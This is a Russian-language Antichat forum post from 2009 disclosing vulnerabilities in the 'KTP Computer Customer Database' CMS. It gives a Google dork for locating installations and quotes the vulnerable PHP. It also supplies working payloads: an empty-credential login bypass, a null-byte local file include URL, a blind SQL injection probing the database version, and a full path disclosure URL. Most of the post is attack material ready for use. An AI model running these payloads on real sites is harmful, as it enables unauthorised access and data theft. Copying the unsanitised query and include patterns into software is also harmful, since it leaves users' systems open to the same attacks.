HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости KTP Computer Customer Database
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости KTP Computer Customer Database
  #1  
Старый 12.04.2009, 21:12
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию Уязвимости KTP Computer Customer Database
Уязвимости KTP Computer Customer Database CMS

Product : KTP Computer Customer Database CMS
Dork : "KTPCCD & KTPotG ©2008 Keith Thibodeaux"
Site: http://sourceforge.net/project/showfiles.php?group_id=245189
Founded by: Dimi4
Date : 12.04.09

Auth bypass
[pages/login.php]
Вот такая вот корявая функция. Проверяет только пароль:

PHP код:
if ($_GET['a'] == "login") {
    $lname $_POST['lname'];
    $lpass md5($_POST['lpass']);

    $q mysql_query("SELECT * FROM techs WHERE tloginname = '$lname'");
    $result mysql_fetch_array($q);

    if ($lpass == $result['tloginpass']) {
        $_SESSION['tid'] = $result['tid'];
        $_SESSION['loggedin'] = "1";
        $_SESSION['tname'] = $result['tfname'] . " " $result['tlname'];
        $lin 1;
        
        $template->assign('name'$_SESSION['tname']);
        $template->assign('id'$_SESSION['tid']);
        
        $template->assign('func'"in");
        $template->display('login.tpl');
    } else {
        echo "login failed";
    } 
Логинимся с пустыми логином и паролем.

Local File Include
[index.php]

PHP код:
if (isset($_GET['p'])) {
    include 'pages/' $_GET['p'] . '.php';
} else {
    include 'pages/index.php';

http://localhost/ktp/?p={PATH}%00

Blind SQL-inj
[index.php]

PHP код:
    function gettech($tid) {
        
        if ($result mysql_query("SELECT * FROM techs WHERE tid = '$tid'")) {
            $tech mysql_fetch_array($result);
            return $tech;
        } else {
            echo mysql_error();
        }
    } 
http://localhost/ktp/?p=tech&a=vtech&tid=1'+and+substring(@@version,1,1 )=[num]--

Full Path Disclosure
[index.php]

Код:
http://localhost/ktp/pages/tech/changepassword.php
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Dimi4; 12.04.2009 в 21:15..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Инъекции m0nzt3r Уязвимости 16037 18.04.2015 20:13
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Уязвимости CMS / форумов 11 01.02.2007 12:21
The computer freezes with no reason? That’s why! Dracula4ever Forum for discussion of ANTICHAT 2 16.07.2006 09:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.